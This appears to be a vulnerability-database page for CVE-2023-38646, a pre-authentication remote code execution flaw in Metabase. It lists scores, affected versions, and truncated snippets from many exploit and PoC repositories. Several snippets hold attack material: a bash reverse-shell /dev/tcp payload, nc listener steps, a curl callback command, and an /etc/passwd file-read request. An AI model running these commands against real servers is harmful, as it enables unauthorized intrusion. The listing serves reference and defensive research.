9.8
CVSSv3

CVE-2023-38646

Published: 21/07/2023 Updated: 15/02/2024
CVSS v3 Base Score: 9.8 | Impact Score: 5.9 | Exploitability Score: 3.9
VMScore: 0

Vulnerability Summary

Metabase open source prior to 0.46.6.1 and Metabase Enterprise prior to 1.46.6.1 allow malicious users to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

metabase metabase

Mailing Lists

Metabase version 0466 pre-authentication remote code execution exploit ...

Github Repositories

CVE-2023-38646 Unauthenticated RCE vulnerability in Metabase

CVE-2023-38646-exploit "This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication" A quick reverse shell exploit script for cve-2023-38646 I did not find this vulnerability, just made the script Usage root@box:~/CVE-2023-38646# python3 exploitpy _______ ______

CVE-2023-38646-exploit "This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authentication" A quick reverse shell exploit script for cve-2023-38646 I did not find this vulnerability, just made the script Usage root@box:~/CVE-2023-38646# python3 exploitpy _______ ______

CVE-2023-38646 (Pre-Auth RCE in Metabase)

CVE-2023-38646 Overview Compile Usage Running CVE-2023-38646 Overview Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources This vulnerability, designated as CVE-2023–38646, allowed attackers to execute arbitrary commands on the server without requiring any authenti

Metabase Pre-auth RCE

CVE-2023-38646 - Metabase Pre-auth RCE Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 PoC Steps Navigate t

This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646.

Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646 The system is vulnerable in versions preceding 04661, in the open-source edition, and preceding 14661, in the enterprise edition Usage The script needs the target URL, the setup token

cve-2023-38646-metabase-ReverseShell run command go run \CVE-2023-38646-metabase-ReverseShellgo -u targetcom:targetPort -h Your VPS IPaddr -p NC listen Port note when you input the target host , please do not forget the or

Automatic Tools For Metabase Exploit Known As CVE-2023-38646

CVE-2023-38646 Automatic Tools For Metabase RCE Exploit Known As CVE-2023-38646 Read secryme/explore/news/metabase-rce-cve-2023-38646/ for more information (POC, Dork) How to Use singlepy python3 singlepy --url=127001:8080 --command="curl subrequestcatchercom/some-endpoint" or python3 singlepy -u http:/

This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646.

Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a script written in Python that allows the exploitation of the Metabase's software security flaw in the described in CVE 2023-38646 The system is vulnerable in versions preceding 04661, in the open-source edition, and preceding 14661, in the enterprise edition Usage The script needs the target URL, the setup token

For educational purposes only

For educational purposes only Inspired by Assetnote research CVE: CVE-2023-38646 CVSS: 98 Vendor link: click Vulnerable version Metabase Enterprise 146 < 14661 Metabase Enterprise 145 < 14541 Metabase Enterprise 144 < 14471 Metabase Enterprise 143 < 14372 Metabase open source 046 < 04661 Metabase open source 045 <

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

CVE-2023-38646 Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection The script will GET /api/session/properties to get the setup token and assess exploitability of the target If it's vulnerable will then print the setup token, else it will quit after an error message If the -x option is used and the target is vulnerable, it will use the provide

Metabase Pre-Auth RCE POC

Metabase Pre-Auth RCE POC - CVE-2023-38646 Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server I have written the script directly to gain reverse shell on the attacker's machine Usage The script require the Target URL, Attackers IP and Port Providing the setup token is not required for

CVE-2023-38646 - Metabase Pre-Auth RCE ⚠️ For educational and authorized security research purposes only Original Exploit Authors Very grateful to the original PoC author securezeron Step Guides Set Up the Listener on your attacker machine: nc -nlvp 4444 Then, run this command: python3 CVE-2023-38646-Reverse-Shellpy -h python3

Exploit script for Pre-Auth RCE in Metabase (CVE-2023-38646)

Metabase Pre-Auth RCE (CVE-2023-38646) POC This is a python script which exploits the remote code execution vulnerability of Metabase's login software It allows us to execute arbitrary commands on the server before authentication Vulnerable versions are Metabase open source before 04661 and Metabase Enterprise before 14661 Usage python3 exploitpy -u URL -t TOKEN -

CVE-2023-38646 Metabase 0.46.6 exploit

CVE-2023-38646 CVE-2023-38646 Metabase 0466 exploit This tool exploits a vulnerability (CVE-2023-38646) in a software platform The exploit allows for remote code execution via a crafted request, leveraging a mishandled database connection string Overview The tool: Fetches the setup token from the target URL Base64 encodes the supplied command Constructs the payload with

CVE-2023-38646-Poc usage python checkpy ip port Vulnerable version Metabase Enterprise 146 < 14661 Metabase Enterprise 145 < 14541 Metabase Enterprise 144 < 14471 Metabase Enterprise 143 < 14372 Metabase open source 046 < 04661 Metabase open source 045 < v04541 Metabase open source 044 < 04471 Metabas

Metabase Pre-auth RCE (CVE-2023-38646)!!

CVE-2023-38646 Metabase Pre-auth RCE!! Usagse Check Manual Exploitation POC: youtube/b51LPjD-uTo

Tools to exploit metabase CVE-2023-38646

Poc-Metabase-Preauth-CVE-2023-38646 Ho to use? λ cve git clone githubcom/LazyySec/CVE-2023-38646git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) go build CVE-2023-38646-Exploitgo λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) ✗ go build Reverse-Shellgo λ Poc-Metabase-Preauth

Metabase postgres (org.h2.Driver) RCE without INIT

Extension of the Pre-Auth RCE in Metabase (CVE-2023-38646) explained here This helped me to avoid errors related to "database already in use" (with H2 and postgre as engines) { "token": "TOKEN", "details": { "is_on_demand": false, "is_full_sync": false, "is_sample": false, "cache_ttl": null, &q

Proof of Concept for CVE-2023-38646

CVE-2023-38646 Proof of Concept for CVE-2023-38646

Metabase Pre-Auth Remote Code Execution CVE-2023-38646 A proof-of-concept for CVE-2023-38646 Metabase Pre-Auth Remote Code Execution Getting Started Executing program With python3 python3 exploitpy -t metabaseurl/ -l 127001 -p 1337 Help For help menu: python3 exploitpy -h Acknowledgme

Remote Code Execution on Metabase CVE-2023-38646

🛡️ Exploit for CVE-2023-38646 🛡️ Welcome to this powerful exploit tool! It's designed specifically to test for the CVE-2023-38646 vulnerability in Metabase servers 🚀 Installation 🚀 The journey begins with Python 3 and pip Install them with the following command: sudo apt-get install python3 python3-pip Next, take off

Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection

CVE-2023-38646 Python script to exploit CVE-2023-38646 Metabase Pre-Auth RCE via SQL injection The script will GET /api/session/properties to get the setup token and assess exploitability of the target If it's vulnerable will then print the setup token, else it will quit after an error message If the -x option is used and the target is vulnerable, it will use the provide

CVE-2023-38646 PoC Description This is a Proof of Concept (PoC) script for exploiting Metabase, an open-source business intelligence and data analytics tool Metabase allows users to visualize and interact with their data, making it a powerful platform for data analysis This vulnerability, designated as CVE-2023-38646, allowed attackers to execute arbitrary commands on the ser

POC for CVE-2023-38646

Metabase Pre Authentication RCE (CVE-2023-38646) We have provided two files:- CVE-2023-38646-POCpy for checking if any metabase intance is leaking setup-token CVE-2023-38646-Reverse-Shellpy to get a reerse shell on the attacker controlled machine CVE-2023-38646-POCpy CVE-2023-38646-Reverse-Shellpy How To Use git clone githubcom/securezeron/CVE-2023-38646

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 (Metabase Pre-Auth RCE) Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 Example usage Open two

Code to detect/exploit vulnerable metabase application

CVE-2023-38646 Code to detect/exploit vulnerable metabase application

CVE-2023-38646-POC

CVE-2023-38646-POC CVE-2023-38646-POC

CVE-2023-38646 (Metabase PreAuth RCE) Description Description of the vulnerability What is Metabase: Metabase is an open source business intelligence tool It lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar graph or a detailed table How to run the scanner python scanne

Metabase Pre-auth RCE (CVE-2023-38646)

Metabase Metabase is an open source business intelligence tool that lets you create charts and dashboards using data from a variety of databases and data sources It’s a popular project, with over 33k stars on GitHub and has had quite a lot of scrutiny from a vulnerability research perspective in the last few years CVE-2023-38646 - Metabase Pre-auth RCE Metabase open sou

RCE Exploit for CVE-2023-38646

CVE-2023-38646 A python RCE exploit for CVE-2023-38646 Usage Start a Listner nc -lvnp <port> Run the exploit python3 CVE-2023-38646py -u <metabase_url> -l <local_ip> -p <local_port> Help python3 CVE-2023-38646py -h usage: CVE-2023-38646py [-h

Tools to exploit metabase CVE-2023-38646

Poc-Metabase-Preauth-CVE-2023-38646 Ho to use? λ cve git clone githubcom/LazyySec/CVE-2023-38646git λ cve cd Poc-Metabase-Preauth-CVE-2023-38646 λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) go build CVE-2023-38646-Exploitgo λ Poc-Metabase-Preauth-CVE-2023-38646 git:(main) ✗ go build Reverse-Shellgo λ Poc-Metabase-Preauth

CVE-2023-38646 Metabase RCE

MetabaseRceTools CVE-2023-38646 Metabase RCE 工具 CVE-2023-38646 RCE 图形化利用工具 验证模块 输入指定网址即可检测未授权Token 命令执行 该模块首先需要执行验证模块获取token才可以使用 JarLocation:metabasejar的位置,默认当前目录 内存马注入 目前仅写了cmd和godzilla模式,通过x-client-data控制 x-clie

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 - Metabase RCE Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 Usage $ python3 CVE-2023-38646p

CVE-2023-38646 原始脚本来源于securezeron 我在测试过程中发现该poc生成的反向shell在经过base6编码后因为末尾的'='字符导致利用失败。对它稍作修改解决了这个问题。 #原始的生成reverse shell负载的代码 >>> base64b64encode("bash -i >&/dev/tcp/10101459/8080 0>&

CVE-2023-38646 Pre-Auth RCE in Metabase

CVE-2023-38646 Fork of kh4sh3i's removing the need for Burp Collector CVE-2023-38646 (Pre-Auth RCE in Metabase): Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation Usage python3 CVE-2023-38646py -u

Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.

CVE-2023-38646 Metabase Pre-Auth RCE (11/26/2023) Metabase open source before 04661 and Metabase Enterprise before 14661 allow attackers to execute arbitrary commands on the server, at the server's privilege level Authentication is not required for exploitation The other fixed versions are 04541, 14541, 04471, 14471, 04372, and 14372 The vulnerab

Analytics CVE-2023-38646 zhuanlanzhihucom/p/647355511 CVE-2021-3493 githubcom/briskets/CVE-2021-3493

Analytics-htb-Rce #first clone the repository git clone githubcom/securezeron/CVE-2023-38646 cd CVE-2023-38646 pip install -r requirementstxt python3 CVE-2023-38646-Reverse-Shellpy -h #the before run reverse shell start netact listeiner and go back to run script as follows python3 CVE-2023-38646-Reverse-Shellpy --rhost {Target Ip address} --lhost {your ip-adress} -

Exploits working {tested my me} for various scenarios

Exploit Collection This is my curated collection of working exploits for various vulnerabilities I will keep updating this repository with new and effective exploits CVE-2023-38646 (Metabase) CVE ID: CVE-2023–38646 Description: This vulnerability allowed attackers to execute arbitrary commands on the Metabase server without requiring any authentication Resolved in Met

免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月16新增 Smart S85F 任意文件读取 帆软channel序列化 泛微Ecology未授权 泛微Ecology OA 前台任意SQL语句执行 HiKVISION 综合

2023 HVV情报速递~

免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月22新增 QQ桌面客户端远程执行 禅道180~183 backstage命令注入 联想网盘存在任意文件上传漏洞 企望制造 ERP comboxsto

免责声明 由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。所涉及工具来自网络,安全性自测。 8月22新增 QQ桌面客户端远程执行 禅道180~183 backstage命令注入 联想网盘存在任意文件上传漏洞 企望制造 ERP comboxsto

Research analysis

English| 中文 Research—By Goby A_shortcut_to_vulnerability_debugging:_streamlining_code_to_speed_up_analysis_and_exploitation In order to facilitate debugging and quickly reproduce the vulnerability, this article attempts to simulate the main logic flow of the vulnerability by using only part of the unit code for dynamic debugging analysis The_story_behind_counterin

sidebar auto 一、2023HW漏洞POC/EXP、情报汇总知识库 11Panel后台存在任意文件读取漏洞 漏洞描述 1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件 POST /api/v1/file/loadfile {"paht":"/etc/passwd"} 2360 新天擎

sidebar auto 一、2023HW漏洞POC/EXP、情报汇总知识库 11Panel后台存在任意文件读取漏洞 漏洞描述 1Panel后台存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的敏感信息文件 POST /api/v1/file/loadfile {"paht":"/etc/passwd"} 2360 新天擎

Embark on my CTFs Journey, where I document my conquests and lessons learned while navigating the dynamic challenges of Capture The Flag contests. From cracking codes to outsmarting puzzles, join me in exploring the diverse landscape of cybersecurity challenges.

Description Welcome to my personal Capture The Flags (CTFs) repository! This repository is created to track my progress, achievements, and detailed notes regarding cybersecurity challenges, especially on popular platforms like TryHackMe, Hack The Box and Rootme Contents This repository contains an organized list of CTF Machines that I have successfully exploited Each entry in

各种漏洞批量扫描poc、exp,涵盖未授权、RCE、文件上传、sql注入、信息泄露等

HAC_Bored_Writing 各种未授权、RCE、文件上传、sql注入、信息泄露漏洞批量扫描poc、exp,跟踪最新漏洞实时更新,目前是把之前写的整合在一起,后续新增会在最下边加一个时间线,想看最新的poc、exp可以根据时间线来选择 2023 华夏erp QVD-2023-32275敏感信息泄露 蓝凌EIS saveIm文件上传 用友U8-Cloud uplo

CVE Exploit PoC's

CVE-2023-21752 针对 Windows 备份服务中任意文件删除漏洞的 PoC。 CVE-2023-29343 Sysmon 版本 1414 中任意文件写入错误的 PoC CVE-2023-36874 该漏洞适用于易受攻击的 Windows 客户端/服务器。 编译代码并创建 c:\test\system32 目录。将 wermgrexe 放入该目录并运行编译后的 PoC。 CVE-2023-20178 Cisco Secure Client(在 5

CVE Exploit PoC's

CVE-2023-21752 针对 Windows 备份服务中任意文件删除漏洞的 PoC。 CVE-2023-29343 Sysmon 版本 1414 中任意文件写入错误的 PoC CVE-2023-36874 该漏洞适用于易受攻击的 Windows 客户端/服务器。 编译代码并创建 c:\test\system32 目录。将 wermgrexe 放入该目录并运行编译后的 PoC。 CVE-2023-20178 Cisco Secure Client(在 5

Linux based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Sigma

Linux-Exploit-Detection Linux-based vulnerabilities (CVE) exploit detection through runtime security using Falco/Osquery/Yara/Rego/Sigma This is an experimental project to evaluate possible ways to detect exploits (CVE) in a Linux environment (HOST/Container/Cloud) using ebpf based - Falco Runtime Security Analytic + Memory based - Osquery + Yara Policy based - Rego + OPA/ Aqu

PoC. Severity critical.

PoC Severity critical 2023 F5 BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747 CVSSv3 Score 98 Vulnerability description This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands There is no data

PoC. Severity critical.

PoC Severity critical 2023 F5 BIG-IP Configuration utility unauthenticated remote code execution vulnerability CVE-2023-46747 CVSSv3 Score 98 Vulnerability description This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands There is no data

一个CVE漏洞预警知识库 no exp/poc

CVE 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究,任何人不得将其用于非授权渗透测试,不得将其用于非法用途和盈利,否则后果自行承担。 无exp/poc,部分包含修复方案 0x01 项目导航 202212 CVE-2022-3328:Snapd 本地权限提升漏洞通告 CVE-2022-41080 41082:Microsoft Exchange Ser

POC集合,框架nday漏洞利用

FrameVul 综合 主流供应商的一些攻击性漏洞汇总 2021_Hvv漏洞 2022年Java应用程序的CVE漏洞 漏洞库合集 公开的信息、漏洞利用、脚本 Goby POC nuclei-templates LiqunKit_ 强化fscan的漏扫POC库 在渗透测试中快速检测常见中间件、组件的高危漏洞。 OAExploit一款基于产品的一键扫描工具 批量扫描破解海康

一个Vulhub漏洞复现知识库

Vulhub-Reproduce 【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 法律法规。 Vulhub漏洞复现,不定时更新。感谢@Vulhub提供开源漏洞靶场。 0x01 项目导航

bounty collection

Contents bounty targets data data components hk1 node modules DbCache Resources for Beginner Bug Bounty Hunters assets javasec study BruteX wordlists loot kalitools Web Applications Hardware Hacking Sniffing Spoofing Vulnerability Analysis Wireless Attacks Forensics Tools image Password Attacks Reverse Engineering Exploitation Tools Information Gathering Reporting Tools Galax

一个漏洞POC知识库

Awesome-POC 【免责声明】本项目所涉及的技术、思路和工具仅供学习,任何人不得将其用于非法用途和盈利,不得将其用于非授权渗透测试,否则后果自行承担,与本项目无关。使用本项目前请先阅读 法律法规。 0x01 项目导航 CHECKLIST Nacos 漏洞 Checklist SmartBi 漏洞 Checklist 安全设备漏洞 Chec

📡 PoC auto collect from GitHub. ⚠️ Be careful Malware.

PoC in GitHub 2023 CVE-2023-0045 (2023-04-25) The current implementation of the prctl syscall does not issue an IBPB immediately during the syscall The ib_prctl_set  function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bi

One-command to detect all remotely exploitable KEV vulnerability. Sourced from CISA KEV, Google's Tsunami and Ostorlab's Asteroid.

Known Exploited Vulnerabilities Detector Introduction This project is dedicated to the detection of known exploited vulnerabilities Our goal is to provide a single command to detect all of these vulnerabilities Requirements Docker is required to run scans locally To install docker, please follow these instructions Installing Ostorlab ships as a Python package on pypi To in